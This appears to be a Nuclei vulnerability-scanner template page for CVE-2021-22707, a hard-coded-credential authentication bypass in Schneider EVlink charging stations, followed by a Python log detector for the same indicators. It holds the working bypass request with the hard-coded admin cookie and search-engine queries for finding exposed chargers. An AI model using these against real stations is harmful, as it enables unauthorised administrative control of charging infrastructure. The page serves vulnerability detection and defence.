EVlink City < R8 V3.4.0.1 - Authentication Bypass
ID: CVE-2021-22707
Severity: critical
Author: ritikchaddha,dorkerdevil
Tags: cve2021,cve,evlink,auth-bypass,schneider-electric
Description
A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.
YAML Source
id: CVE-2021-22707

info:
  name: EVlink City < R8 V3.4.0.1 - Authentication Bypass
  author: ritikchaddha,dorkerdevil
  severity: critical
  description: |
    A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.
  remediation: |
    Upgrade to EVlink City R8 V3.4.0.1 or later to fix the authentication bypass vulnerability.
  reference:
    - https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22707
    - http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-22707
    cwe-id: CWE-798
    epss-score: 0.39995
    epss-percentile: 0.97263
    cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: schneider-electric
    product: evlink_city_evc1s22p4_firmware
    shodan-query:
      - title:"EVSE web interface"
      - http.title:"evse web interface"
    fofa-query:
      - title="EVSE web interface"
      - title="evse web interface"
    google-query: intitle:"evse web interface"
  tags: cve2021,cve,evlink,auth-bypass,schneider-electric

http:
  - raw:
      - |
        GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Cookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '?worker=Cluster" name="cluster" id="id_cluster'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f41796ac38d2548960fb3a75a6bcaf4ac27fee79e06b68d3e0323e6ffdcd54db022100f0382bed446a1a7137c349841814fc0caed7a77d5b26f0d982ef9676e3d74406:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is run with the Nuclei scanner. It sends the single request defined above and reports the target as vulnerable only when the response satisfies both matchers (the cluster-page marker in the body and an HTTP 200 status), since matchers-condition is set to and.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-22707.yaml"
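For operators who cannot patch immediately, the same hard-coded cookie pair the template sends is also a usable detection indicator on the charger's web logs. The following added Python example (not part of the template or the project) flags requests to the CGI worker endpoint that present the hard-coded CURLTOKEN or the literal SESSIONID=admin from this page; the log lines are constructed samples in Apache combined format with a trailing %{Cookie}i field, which is an assumption about how the reverse proxy or server is configured.

```python
import re
from typing import Dict, List

# Indicators taken from the Nuclei template on this page (not invented here).
WORKER_PATH = "/cgi-bin/cgiServer"
HARDCODED_CURLTOKEN = "b35fcdc1ea1221e6dd126e172a0131c5a"
HARDCODED_SESSION = "admin"

# Constructed sample log: combined format plus a final quoted Cookie header field.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2024:10:01:02 +0000] "GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1" 200 5123 "-" "curl/7.88.1" "CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin"
198.51.100.7 - - [12/Mar/2024:10:02:15 +0000] "GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1" 200 5123 "-" "Mozilla/5.0" "CURLTOKEN=9f1e0a7c3d5b2e8f4a6c1d0b3e5f7a9c1; SESSIONID=operator"
203.0.113.10 - - [12/Mar/2024:10:03:40 +0000] "POST /cgi-bin/cgiServer?worker=Cluster HTTP/1.1" 200 210 "-" "curl/7.88.1" "SESSIONID=admin"
192.0.2.5 - - [12/Mar/2024:10:04:00 +0000] "GET /static/logo.png HTTP/1.1" 200 8342 "-" "Mozilla/5.0" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)


def parse_cookies(raw: str) -> Dict[str, str]:
    """Split a logged Cookie header into a name->value map ('-' means none logged)."""
    if raw in ("", "-"):
        return {}
    pairs = (p.strip().split("=", 1) for p in raw.split(";") if "=" in p)
    return {k.strip(): v.strip() for k, v in pairs}


def flag_hardcoded_session_requests(log_text: str) -> List[Dict[str, str]]:
    """Return one hit per request to the CGI worker that carries a hard-coded credential."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m.group("path").startswith(WORKER_PATH):
            continue
        cookies = parse_cookies(m.group("cookie"))
        reasons = []
        if cookies.get("CURLTOKEN") == HARDCODED_CURLTOKEN:
            reasons.append("known hard-coded CURLTOKEN")
        if cookies.get("SESSIONID") == HARDCODED_SESSION:
            reasons.append("literal SESSIONID=admin")
        if reasons:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "path": m.group("path"), "reason": "; ".join(reasons)})
    return hits


if __name__ == "__main__":
    for hit in flag_hardcoded_session_requests(SAMPLE_LOG):
        print(hit)
```

A hit on a station that is still below R8 V3.4.0.1 should be treated as an attempted or successful administrative bypass until proven otherwise.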